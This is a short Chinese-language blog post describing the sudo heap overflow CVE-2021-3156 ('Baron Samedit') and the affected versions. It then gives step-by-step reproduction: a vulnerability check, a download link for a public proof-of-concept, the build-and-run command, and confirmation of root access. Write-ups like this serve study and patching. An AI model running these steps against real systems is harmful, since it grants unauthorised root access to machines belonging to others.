Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。
当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。
安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。
影响的sudo版本为Sudo 1.8.2 - 1.8.31p2,Sudo 1.9.0 - 1.9.5p1
在普通用户权限上,输入:sudoedit -s /
如果显示sudoedit: /: not a regular file,则表示该漏洞存在
https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
make &&./sudo-hax-me-a-sandwich 0
有#表示漏洞利用成功。接下来我们可以看是否是root权限
输入id
查看下版本信息
sudo --version
漏洞利用成功!
本文分享自微信公众号 - 暗魂安全团队(anhunsec)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
来源:oschina
链接:https://my.oschina.net/u/4581882/blog/4941316